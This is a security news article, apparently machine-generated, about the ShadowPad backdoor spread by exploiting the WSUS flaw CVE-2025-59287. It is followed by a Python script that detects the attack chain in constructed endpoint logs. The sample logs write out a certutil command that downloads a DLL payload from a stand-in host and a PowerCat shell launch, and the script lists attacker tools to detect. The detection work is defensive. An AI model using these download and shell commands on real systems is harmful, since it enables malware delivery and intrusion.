

Ethical Hacking News

The ShadowPad Malware Menace: A Critical Vulnerability in Microsoft's WSUS Exposed




A new vulnerability in Microsoft's Windows Server Update Services (WSUS) has been exploited by threat actors to distribute the ShadowPad malware, a modular backdoor widely used by Chinese state-sponsored hacking groups. This article explores the intricacies of the ShadowPad malware and its connection to the CVE-2025-59287 vulnerability in WSUS, highlighting the importance of keeping software up to date and applying security patches in a timely manner.

  • A security flaw in Microsoft's Windows Server Update Services (WSUS) was recently patched but has been exploited by threat actors.
  • The CVE-2025-59287 vulnerability allows for remote code execution with system privileges, increasing the potential impact of the attack.
  • ShadowPad malware, a modular backdoor widely used by Chinese state-sponsored hacking groups, was distributed using the exploit.
  • The attackers used ShadowPad for reconnaissance, data exfiltration, and command and control (C2) activities.
  • The importance of keeping software up to date and applying security patches in a timely manner is highlighted.



The cybersecurity landscape has witnessed an influx of vulnerabilities and malware attacks in recent times, leaving organizations to grapple with an ever-evolving threat landscape. In this context, a security flaw in Microsoft's Windows Server Update Services (WSUS) that was recently patched has been exploited by threat actors to distribute malware known as ShadowPad. This article delves into the intricacies of the ShadowPad malware and its connection to the CVE-2025-59287 vulnerability in WSUS.

According to AhnLab Security Intelligence Center, a South Korean cybersecurity company, the attackers targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access. This critical deserialization flaw in WSUS can be exploited to achieve remote code execution with SYSTEM privileges, which significantly increases the potential impact of an attack.

Once the attackers gained initial access, they used PowerCat, an open-source PowerShell-based Netcat utility, to obtain a system shell (CMD). They then downloaded and installed ShadowPad using certutil and curl. The malware was launched via DLL side-loading: a legitimate binary ("ETDCtrlHelper.exe") was used to load a DLL payload ("ETDApix.dll"), which acts as a memory-resident loader that executes the backdoor.

ShadowPad, assessed to be a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups. It first emerged in 2015 and has since been observed in attacks targeting organizations worldwide. In an analysis published in August 2021, SentinelOne referred to it as a "masterpiece of privately sold malware in Chinese espionage."

The attackers used ShadowPad for a variety of purposes, including reconnaissance, data exfiltration, and command and control (C2). The malware also contains anti-detection and persistence techniques, making it difficult for security software to detect and remove.

CVE-2025-59287 has been under heavy exploitation since Microsoft patched it last month. Threat actors have used the vulnerability to obtain initial access to publicly exposed WSUS instances, conduct reconnaissance, and even drop legitimate tools such as Velociraptor. This underscores the importance of keeping software up to date and applying security patches promptly.

In conclusion, the ShadowPad campaign is a prime example of the consequences of neglecting software updates and leaving vulnerabilities unpatched. The critical deserialization flaw in WSUS that was recently patched has been exploited by threat actors to distribute this backdoor. Cybersecurity professionals must remain vigilant and proactive in addressing emerging threats and vulnerabilities.
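As an added example (not code from the article, from AhnLab, or from any of the linked sources), the following Python script runs simple detection heuristics for the post-exploitation chain described above over a handful of constructed process-creation and image-load records. Only PowerCat, certutil, curl, ETDCtrlHelper.exe and ETDApix.dll come from the article; the WSUS host process names (WsusService.exe, w3wp.exe), the record field names, the timestamps, paths and IP address, and the premise that a vendor binary should not be loading its companion DLL from a user-writable directory are assumptions made for the example.

```python
"""Heuristic detection of the WSUS -> shell -> LOLBin download -> DLL
side-load chain over constructed endpoint telemetry.

Added example; not code from the article or from AhnLab.
"""
import re
from typing import Dict, List, Tuple

# Assumed WSUS host processes (not named in the article): the WSUS service
# itself and the IIS worker process that serves the WSUS web endpoints.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Living-off-the-land downloaders named in the article.
DOWNLOADERS = {"certutil.exe", "curl.exe"}
# Side-loading pair named in the article.
SIDELOAD_HOST = "etdctrlhelper.exe"
SIDELOAD_DLL = "etdapix.dll"
# Directories a low-privilege account can normally write to. Assumption for
# the example: a vendor DLL should not be loaded from one of these.
WRITABLE_DIRS = re.compile(r"^c:\\(programdata|users|windows\\temp)\\", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (or of a bare image name)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the name of every heuristic the event trips (empty if benign)."""
    hits: List[str] = []
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent", ""))
    cmdline = event.get("cmdline", "")
    dll = event.get("loaded_dll", "")

    # 1. The WSUS host process has no business spawning a command shell.
    if parent in WSUS_PARENTS and image in SHELLS:
        hits.append("wsus_spawned_shell")
    # 2. certutil/curl invoked with a URL: the tooling download step.
    if image in DOWNLOADERS and URL.search(cmdline):
        hits.append("lolbin_download")
    # 3. PowerCat referenced anywhere on the command line.
    if "powercat" in cmdline.lower():
        hits.append("powercat_usage")
    # 4. The known side-load pair, with the DLL in a user-writable directory.
    if image == SIDELOAD_HOST and basename(dll) == SIDELOAD_DLL and WRITABLE_DIRS.match(dll):
        hits.append("dll_sideload_from_writable_dir")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(timestamp, rule) for every heuristic hit, in log order."""
    return [(ev["ts"], rule) for ev in events for rule in classify(ev)]


# Constructed sample telemetry, loosely modelled on Sysmon process-creation
# and image-load records. Timestamps, paths and the 203.0.113.5 address
# (RFC 5737 documentation range) are invented for the example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ts": "2025-11-20T03:14:05Z", "parent": "WsusService.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2025-11-20T03:14:09Z", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\ProgramData\\powercat.ps1"},
    {"ts": "2025-11-20T03:15:31Z", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://203.0.113.5/ETDApix.dll C:\\ProgramData\\ETDApix.dll"},
    {"ts": "2025-11-20T03:16:02Z", "parent": "cmd.exe",
     "image": "C:\\ProgramData\\ETDCtrlHelper.exe", "cmdline": "ETDCtrlHelper.exe",
     "loaded_dll": "C:\\ProgramData\\ETDApix.dll"},
    # Two benign records that must not fire.
    {"ts": "2025-11-20T03:16:40Z", "parent": "services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"ts": "2025-11-20T03:17:01Z", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\curl.exe", "cmdline": "curl.exe --version"},
]

if __name__ == "__main__":
    for ts, rule in scan(SAMPLE_EVENTS):
        print(f"{ts}  {rule}")
```

Each heuristic on its own is noisy (curl with a URL is routine on many hosts), so in practice the value comes from correlating the hits in sequence on one host within a short window; the parent-process names and the writable-directory list also need tuning to the environment, since the article does not say where the legitimate binary was installed.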



Related Information:

  • https://www.ethicalhackingnews.com/articles/The-ShadowPad-Malware-Menace-A-Critical-Vulnerability-in-Microsofts-WSUS-Exposed-ehn.shtml
  • https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
  • https://cyberpress.org/shadowpad-malware/
  • https://nvd.nist.gov/vuln/detail/CVE-2025-59287
  • https://www.cvedetails.com/cve/CVE-2025-59287/


Published: Mon Nov 24 02:37:35 2025 by llama3.2 3B Q4_K_M

© Ethical Hacking News. All rights reserved.